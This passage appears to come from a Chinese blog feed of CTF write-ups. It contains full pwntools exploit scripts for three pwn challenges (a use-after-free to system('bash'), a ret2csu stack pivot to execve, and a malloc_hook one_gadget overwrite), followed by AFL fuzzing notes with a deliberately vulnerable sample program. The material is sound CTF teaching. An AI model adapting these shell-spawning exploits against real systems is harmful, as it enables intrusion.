class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i5 == i1 <span class="keyword">or</span> i5 == i2 <span class="keyword">or</span> i5 == i3 <span class="keyword">or</span> i5 ==i4 <span class="keyword">or</span> i5 == <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> index = []</span><br><span class="line"> index.append(i1)</span><br><span class="line"> index.append(i2)</span><br><span class="line"> index.append(i3)</span><br><span class="line"> index.append(i4)</span><br><span class="line"> index.append(i5)</span><br><span class="line"> num5.append(index)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> num1:</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> num2:</span><br><span class="line"> <span class="keyword">if</span> (i1[<span class="number">2</span>] <= i2[<span class="number">2</span>] <span class="keyword">or</span> i1[<span class="number">4</span>] <= i2[<span class="number">4</span>]):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> flag = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> <span class="keyword">if</span> (i2[i] == i1[i]):</span><br><span class="line"> flag = <span class="number">1</span> </span><br><span class="line"> <span class="keyword">if</span> (flag == <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> num3:</span><br><span class="line"> flag = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> <span class="keyword">if</span> (i3[i] == i1[i] <span class="keyword">or</span> i3[i] == i2[i]):</span><br><span class="line"> flag = <span class="number">1</span></span><br><span class="line"> <span class="keyword">if</span> (flag == <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> num4:</span><br><span class="line"> flag = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> <span class="keyword">if</span> (i4[i] == i1[i] <span class="keyword">or</span> i4[i] == i2[i] <span class="keyword">or</span> i4[i] == i3[i]):</span><br><span class="line"> flag = <span class="number">1</span></span><br><span class="line"> <span class="keyword">if</span> (flag == <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> num5:</span><br><span class="line"> <span class="keyword">if</span> (i4[<span class="number">1</span>] >= i5[<span class="number">1</span>] <span class="keyword">or</span> i4[<span class="number">4</span>] >= i5[<span class="number">4</span>]):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> flag = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> <span class="keyword">if</span> (i5[i] == i1[i] <span class="keyword">or</span> i5[i] == i2[i] <span class="keyword">or</span> i5[i] == i3[i] <span class="keyword">or</span> i5[i] == i4[i]):</span><br><span class="line"> flag = <span class="number">1</span></span><br><span class="line"> <span class="keyword">if</span> (flag == <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="built_in">print</span>(<span class="string">'========================'</span>)</span><br><span class="line"> <span class="built_in">print</span>(i1)</span><br><span class="line"> <span class="built_in">print</span>(i2)</span><br><span class="line"> <span class="built_in">print</span>(i3)</span><br><span class="line"> <span class="built_in">print</span>(i4)</span><br><span class="line"> <span class="built_in">print</span>(i5)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">'========================'</span>)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>[1, 4, 2, 5, 3]<br>[5, 3, 1, 4, 2]<br>[3, 5, 4, 2, 1]<br>[2, 1, 5, 3, 4]<br>[[4, 2, 3, 1, 5]</p>
<p>fill_number 会检查</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">map</span><br><span class="line">00000</span><br><span class="line">00000</span><br><span class="line">04400</span><br><span class="line">00030</span><br><span class="line">00010</span><br></pre></td></tr></table></figure>
<p>最后 md5(1425353142350212150442315,32) = 8a04b4597ad08b83211d3adfa1f61431</p>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>CISCN_2019</title>
<url>/article/CISCN_2019/</url>
<content><![CDATA[<h1 id="CISCN-2019"><a href="#CISCN-2019" class="headerlink" title="CISCN_2019"></a>CISCN_2019</h1><span id="more"></span>
<h1 id="ciscn-2019-n-3"><a href="#ciscn-2019-n-3" class="headerlink" title="ciscn_2019_n_3"></a>ciscn_2019_n_3</h1><p>保护</p>
<p><img src="/article/CISCN_2019/image-20210526120532732.png" alt="image-20210526120532732"></p>
<p>ida</p>
<ul>
<li>new</li>
</ul>
<p><img src="/article/CISCN_2019/image-20210526121417172.png" alt="image-20210526121417172"></p>
<ul>
<li><p>del</p>
<p><img src="/article/CISCN_2019/image-20210526121954287.png" alt="image-20210526121954287"></p>
</li>
<li><p>dump</p>
<p><img src="/article/CISCN_2019/image-20210526122032820.png" alt="image-20210526122032820"></p>
</li>
</ul>
<h2 id="解题思路:"><a href="#解题思路:" class="headerlink" title="解题思路:"></a>解题思路:</h2><p>uaf漏洞。程序new之前先malloc了0xC的chunk,用来存放 print 和 free 指针</p>
<ul>
<li>1、直接写入数值</li>
<li>2、写入一个指向string的chunk指针</li>
</ul>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">add(<span class="number">0</span>,<span class="number">2</span>,<span class="string">'aaaa'</span>,<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">1</span>,<span class="string">''</span>,<span class="number">0x10</span>)</span><br></pre></td></tr></table></figure>
<p><img src="/article/CISCN_2019/image-20210526123328831.png" alt="image-20210526123328831"></p>
<p>根据 fastbin FILO 的特性,执行 free(0)、free(1) ,再new一个string类型,便可以修改 free 指针为 system_plt,同时 string 指针的最后一个字节会被修改为 \n (0x0a),就刚好指向了 print 指针处,把这个地方修改为 bash。执行 free(0) -> system(‘bash’),达成getshell</p>
<p><img src="/article/CISCN_2019/image-20210526124650393.png" alt="image-20210526124650393"></p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process('./ciscn_2019_n_3')</span></span><br><span class="line">p = remote(<span class="string">'node3.buuoj.cn'</span>,<span class="number">26908</span>)</span><br><span class="line"><span class="comment">#p = remote('127.0.0.1',12345)</span></span><br><span class="line">elf = ELF(<span class="string">'./ciscn_2019_n_3'</span>)</span><br><span class="line"></span><br><span class="line">sys_addr = elf.plt[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,<span class="type">Type</span>,content,length=<span class="number">0</span></span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'CNote > '</span>,<span class="string">'1'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index > '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">'Type > '</span>,<span class="built_in">str</span>(<span class="type">Type</span>))</span><br><span class="line"> <span class="keyword">if</span> <span class="type">Type</span> == <span class="number">2</span>: </span><br><span class="line"> p.sendlineafter(<span class="string">'Length > '</span>,<span class="built_in">str</span>(length))</span><br><span class="line"> p.sendlineafter(<span class="string">'Value > '</span>,content)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> p.sendlineafter(<span class="string">'Value > '</span>,<span class="built_in">str</span>(length))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'CNote > '</span>,<span class="string">'2'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index > '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'CNote > '</span>,<span class="string">'3'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index > '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">2</span>,<span class="string">'bbbb'</span>,<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">1</span>,<span class="string">'a'</span>,<span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">2</span>,<span class="number">2</span>,<span class="string">'bash'</span>+p32(sys_addr),<span class="number">0xc</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>DASCTF2022.3</title>
<url>/article/DASCTF2022.3/</url>
<content><![CDATA[<h1 id="DASCTF2022-3"><a href="#DASCTF2022-3" class="headerlink" title="DASCTF2022.3"></a>DASCTF2022.3</h1><!-- 文章页 配置 -->
<h1 id="checkin"><a href="#checkin" class="headerlink" title="checkin"></a>checkin</h1><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'checkin'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">25323</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./libc.so.6'</span>)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">fake_stack = <span class="number">0x404500</span></span><br><span class="line">main_read = <span class="number">0x0000000004011BF</span></span><br><span class="line">leave = <span class="number">0x00000000004011E2</span></span><br><span class="line">read_got = <span class="number">0x404018</span></span><br><span class="line">csu_begin = <span class="number">0x040124A</span></span><br><span class="line">main = <span class="number">0x000000000401156</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">csu</span>(<span class="params">function,rdi,rsi,rdx</span>):</span></span><br><span class="line"> payload = p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + p64(rdi) + p64(rsi) + p64(rdx) + p64(function)</span><br><span class="line"> payload += p64(<span class="number">0x401230</span>) + p64(<span class="number">0</span>)*<span class="number">7</span></span><br><span class="line"> <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p,'b *0x0000000004011CB')</span></span><br><span class="line"><span class="comment"># gdb.attach(p,'b *0x401239\nc\n')</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0xa0</span> + p64(fake_stack+<span class="number">0xa0</span>) + p64(main_read)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">payload = p64(csu_begin)</span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,read_got,<span class="number">2</span>) + p64(main)</span><br><span class="line">payload = payload.ljust(<span class="number">0xa0</span>,<span class="string">'\x00'</span>)</span><br><span class="line">payload += p64(fake_stack-<span class="number">8</span>) + p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">p.send(<span class="string">'\x00\x40'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 2</span></span><br><span class="line">bin_sh = <span class="number">0x404800</span></span><br><span class="line">fake_stack += <span class="number">0x200</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0xa0</span> + p64(fake_stack+<span class="number">0xa0</span>) + p64(main_read)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">payload = p64(csu_begin)</span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + p64(<span class="number">0</span>) + p64(fake_stack+<span class="number">0x100</span>) + p64(<span class="number">0x3B</span>) + p64(read_got) + p64(<span class="number">0x0401230</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">2</span> + p64(<span class="number">1</span>) + p64(bin_sh) + p64(<span class="number">0</span>)*<span class="number">2</span> + p64(read_got) + p64(<span class="number">0x0401230</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0xa0</span>,<span class="string">'\x00'</span>)</span><br><span class="line">payload += p64(fake_stack-<span class="number">8</span>) + p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">payload = <span class="string">'/bin/sh\x00'</span>.ljust(<span class="number">0x3b</span>,<span class="string">'a'</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp/笔记</category>
</categories>
</entry>
<entry>
<title>DASCTF_2021_3</title>
<url>/article/DASCTF_2021_3/</url>
<content><![CDATA[<h1 id="DASCTF-2021-3"><a href="#DASCTF-2021-3" class="headerlink" title="DASCTF_2021_3"></a>DASCTF_2021_3</h1><span id="more"></span>
<h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="fruitpie"><a href="#fruitpie" class="headerlink" title="fruitpie"></a>fruitpie</h2><p>保护全开</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">[*] '/home/trick/Desktop/fruitpie'</span><br><span class="line"> Arch: amd64-64-little</span><br><span class="line"> RELRO: Full RELRO</span><br><span class="line"> Stack: Canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: PIE enabled</span><br></pre></td></tr></table></figure>
<p>IDA</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">size_t</span> size; <span class="comment">// [rsp+4h] [rbp-1Ch]</span></span><br><span class="line"> <span class="keyword">char</span> *v5; <span class="comment">// [rsp+10h] [rbp-10h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> __int64 v6; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line"> v6 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"> init(*(_QWORD *)&argc, argv, envp);</span><br><span class="line"> welcome();</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Enter the size to malloc:"</span>);</span><br><span class="line"> LODWORD(size) = readInt(<span class="string">"Enter the size to malloc:"</span>);</span><br><span class="line"> v5 = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>((<span class="keyword">unsigned</span> <span class="keyword">int</span>)size);</span><br><span class="line"> <span class="keyword">if</span> ( !v5 )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Malloc Error"</span>);</span><br><span class="line"> <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%p\n"</span>, v5);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Offset:"</span>);</span><br><span class="line"> _isoc99_scanf(<span class="string">"%llx"</span>, (<span class="keyword">char</span> *)&size + <span class="number">4</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Data:"</span>);</span><br><span class="line"> read(<span class="number">0</span>, &v5[*(<span class="keyword">size_t</span> *)((<span class="keyword">char</span> *)&size + <span class="number">4</span>)], <span class="number">0x10</span>uLL);</span><br><span class="line"> <span class="built_in">malloc</span>(<span class="number">0xA0</span>uLL);</span><br><span class="line"> close(<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>利用思路</p>
<ul>
<li>获取libc_base:当申请一个足够大的堆时会由mmap分配,此时程序会给我们chunk的地址,而这个地址紧挨着libc并且偏移固定</li>
<li>将one_gadget写到realloc_hook地址中,在malloc_hook的地址写入realloc + x来调整栈帧,x的取值可以有2,4,6,8,9。</li>
</ul>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">"debug"</span></span><br><span class="line"></span><br><span class="line">context.arch=<span class="string">"amd64"</span></span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'183.129.189.60'</span>,<span class="number">10018</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process("./fruitpie")</span></span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">'./libc.so.6'</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'Enter the size to malloc:'</span>,<span class="string">'99999999'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'0x'</span>)</span><br><span class="line"></span><br><span class="line">addr = <span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(addr)</span><br><span class="line"></span><br><span class="line">libc_base = addr + <span class="number">0x5f5eff0</span></span><br><span class="line"></span><br><span class="line">one = [<span class="number">0x4f365</span>,<span class="number">0x4f3c2</span>,<span class="number">0x10a45c</span>]</span><br><span class="line"></span><br><span class="line">malloc_hook = libc_base + libc.symbols[<span class="string">'__malloc_hook'</span>]</span><br><span class="line"></span><br><span class="line">realloc_hook = malloc_hook - <span class="number">0x8</span></span><br><span class="line"></span><br><span class="line">realloc = libc_base + libc.symbols[<span class="string">'realloc'</span>]</span><br><span class="line"></span><br><span class="line">one_gadget = libc_base + one[<span class="number">1</span>] <span class="comment">#0x4f3c2</span></span><br><span class="line"></span><br><span class="line">offset = realloc_hook - addr</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(realloc_hook)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'Offset:'</span>,<span class="built_in">hex</span>(offset))</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'Data:'</span>,p64(one_gadget) + p64(realloc+<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>FUZZ-AFL</title>
<url>/article/FUZZ-AFL/</url>
<content><![CDATA[<h1 id="FUZZ-AFL"><a href="#FUZZ-AFL" class="headerlink" title="FUZZ-AFL"></a>FUZZ-AFL</h1><!-- 文章页 配置 -->
<h1 id="浅试FUZZ-AFL安装与使用"><a href="#浅试FUZZ-AFL安装与使用" class="headerlink" title="浅试FUZZ-AFL安装与使用"></a>浅试FUZZ-AFL安装与使用</h1><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>官网下载:<a href="https://lcamtuf.coredump.cx/afl/">https://lcamtuf.coredump.cx/afl/</a></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">make</span><br><span class="line">sudo make install</span><br></pre></td></tr></table></figure>
<p>验证成功</p>
<p><img src="/article/FUZZ-AFL/image-20220424191446449.png" alt="image-20220424191446449"></p>
<h2 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h2><p>创建两个文件夹</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">mkdir fuzz_in</span><br><span class="line">mkdir fuzz_out</span><br></pre></td></tr></table></figure>
<p>简单的测试用例</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><signal.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">fun</span><span class="params">(<span class="keyword">char</span> *buf)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span>(buf[<span class="number">0</span>]=<span class="string">'a'</span>&&<span class="built_in">strlen</span>(buf)==<span class="number">5</span>)</span><br><span class="line"> raise(SIGSEGV); <span class="comment">// 如果输入的字符串开头是a,且长度为5,则异常退出</span></span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">char</span> buf[<span class="number">100</span>]={<span class="number">0</span>};</span><br><span class="line"> gets(buf); <span class="comment">//栈溢出漏洞</span></span><br><span class="line"> <span class="built_in">printf</span>(buf); <span class="comment">//格式化字符串漏洞</span></span><br><span class="line"> fun(buf);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h3 id="编译"><a href="#编译" class="headerlink" title="编译"></a>编译</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">afl-gcc -g -o <span class="built_in">test</span> test.c</span><br></pre></td></tr></table></figure>
<h3 id="创建数据"><a href="#创建数据" class="headerlink" title="创建数据"></a>创建数据</h3><p>在fuzz_in文件夹中创建文件test,并随便输入一些数据</p>
<h3 id="开始FUZZ"><a href="#开始FUZZ" class="headerlink" title="开始FUZZ"></a>开始FUZZ</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">afl-fuzz -i fuzz_in -o fuzz_out ./<span class="built_in">test</span></span><br></pre></td></tr></table></figure>
<p><img src="/article/FUZZ-AFL/image-20220424192447765.png" alt="image-20220424192447765"></p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>在fuzz_out的crashes文件中找到需要分析的crash</p>
<p><img src="/article/FUZZ-AFL/image-20220424193216200.png" alt="image-20220424193216200"></p>
<ol>
<li></li>
</ol>
<h1 id="FUZZ之源码阅读"><a href="#FUZZ之源码阅读" class="headerlink" title="FUZZ之源码阅读"></a>FUZZ之源码阅读</h1><p>读源码真的会谢</p>
<h2 id="获取命令行参数"><a href="#获取命令行参数" class="headerlink" title="获取命令行参数"></a>获取命令行参数</h2><p>通过<code>getopt</code>扫描我们的 argv 里面的参数。</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">while</span> ((opt = getopt(argc, argv, <span class="string">"+i:o:f:m:t:T:dnCB:S:M:x:Q"</span>)) > <span class="number">0</span>)</span><br></pre></td></tr></table></figure>
<ul>
<li><p>-i:设置输入文件。</p>
<ul>
<li>如果 in_dir = “-“,设置 in_place_resume = 1</li>
</ul>
</li>
<li><p>-o:设置输出文件。</p>
</li>
<li><p>-M:主同步ID(sync_id),用于并行fuzz。</p>
<ul>
<li><code>force_deterministic = 1</code>,</li>
</ul>
</li>
<li><p>-S:从同步ID(sync_id),用于并行fuzz。</p>
</li>
<li><p>-f:模糊程序读取case的位置。</p>
<ul>
<li><code>out_file</code>变量被赋值。</li>
</ul>
</li>
<li><p>-x:设置自定义token(一些容易触发漏洞的输入,比如边界值、很大的数…)。用于后面变异过程中的替换和插入。</p>
<ul>
<li><code>extras_dir</code>变量被赋值。</li>
</ul>
</li>
<li><p>-t:设置被测试程序的运行时间限制。</p>
<ul>
<li><code>exec_tmout</code>变量被赋值(%u)。</li>
<li>如果后缀为”+”,则 timeout_given = 2;否则 timeout_given = 1,表示设置了运行时间限制。</li>
</ul>
</li>
<li><p>-m:设置被测程序的内存空间大小。</p>
<ul>
<li><code>mem_limit_given = 1</code>,表示设置了内存空间。</li>
<li><code>mem_limit</code>变量被赋值为内存大小,默认单位是M,可以设置K、G、T。</li>
</ul>
</li>
<li><p>-d:跳过变异时的确定性变异阶段。</p>
<ul>
<li><code>skip_deterministic = 1</code></li>
<li><code>use_splicing = 1</code>,(重新组合输入文件)</li>
</ul>
</li>
<li><p>-B:读取位图?(基本用不到)</p>
<ul>
<li>大概意思是:在测试的过程中如果发现了有趣的测试用例,在没有发现新的测试用例的情况下对其进行变异。</li>
<li><code>in_bitmap</code>变量被赋值。</li>
</ul>
</li>
<li><p>-C:将一个测试用例crash作为afl-fuzz的输入。(crash mode)</p>
<ul>
<li>可以快速地产生很多和输入crash相关,但稍微不同的crashes。</li>
<li><code>crash_mode</code>变量被赋值。</li>
</ul>
</li>
<li><p>-n:非插桩模式。(dumb mode)</p>
<ul>
<li>如果环境变量中有”AFL_DUMB_FORKSRV”,<code>dumb_mode = 2</code>,否则为1。</li>
</ul>
</li>
<li><p>-T:修改横幅名称</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">afl-fuzz -i fuzz_in -o fuzz_out -T aTestOpt-T ./<span class="built_in">test</span></span><br></pre></td></tr></table></figure>
<p>在fuzz时横幅会变成:american fuzzy lop 2.52b (aTestOpt-T)</p>
<p>如果没有-T,默认是程序名称,也就是test</p>
</li>
<li><p>-Q:QEMU模式。</p>
<ul>
<li><code>qemu_mode = 1</code></li>
<li>如果没有设置运行内存限制(-m),即(!mem_limit_given),则<code>mem_limit = MEM_LIMIT_QEMU</code>。</li>
</ul>
</li>
<li><p>default:<code>usage(argv[0])</code></p>
<p>打印使用提示。</p>
</li>
</ul>
<h2 id="setup-signal-handlers"><a href="#setup-signal-handlers" class="headerlink" title="setup_signal_handlers"></a>setup_signal_handlers</h2><p>注册必要的信号处理函数</p>
<ul>
<li><p>停止的各种方式</p>
<ul>
<li>如果进程接收到这些信号中的一个,而事先又没有安排捕获它,进程就会终止。</li>
<li>SIGHUP(hangup):连接挂断</li>
<li>SIGINT(interrupt):终端中断</li>
<li>SIGTERM(software termination signal from kill):终止</li>
<li>handle_stop_sig<ul>
<li>设置stop_soon为1</li>
<li>如果child_pid存在,向其发送SIGKILL终止信号,从而被系统杀死</li>
<li>如果forksrv_pid存在,向其发送SIGKILL终止信号</li>
</ul>
</li>
</ul>
</li>
<li><p>处理超时的情况</p>
<ul>
<li>SIGALRM(alarm clock)</li>
<li>handle_timeout<ul>
<li>如果child_pid>0,则设置child_timed_out为1,并kill掉child_pid</li>
<li>如果child_pid==-1,且forksrv_pid>0,则设置child_timed_out为1,并kill掉forksrv_pid</li>
</ul>
</li>
</ul>
</li>
<li><p>处理窗口大小变化的信号</p>
<ul>
<li>SIGWINCH(Window resize)</li>
<li>handle_resize<ul>
<li>设置clear_screen=1</li>
</ul>
</li>
</ul>
</li>
<li><p>用户自定义信号</p>
<ul>
<li>SIGUSR1(user defined signal 1)</li>
<li>handle_skipreq<ul>
<li>设置skip_requested=1</li>
</ul>
</li>
</ul>
</li>
<li><p>不关心的信号</p>
<ul>
<li>SIGTSTP(stop signal from tty)</li>
<li>SIGPIPE(write on a pipe with no one to read it)</li>
<li>设置为SIG_IGN(忽略信号)</li>
</ul>
</li>
</ul>
<h2 id="check-asan-opts"><a href="#check-asan-opts" class="headerlink" title="check_asan_opts"></a>check_asan_opts</h2><p>读取环境变量<code>ASAN_OPTIONS</code>和<code>MSAN_OPTIONS</code>,做一些必要性检查</p>
<p>ASAN是一个快速的内存错误检测工具</p>
<h2 id="fix-up-sync"><a href="#fix-up-sync" class="headerlink" title="fix_up_sync"></a>fix_up_sync</h2><p>检查环境变量中的一些冲突参数。</p>
<ul>
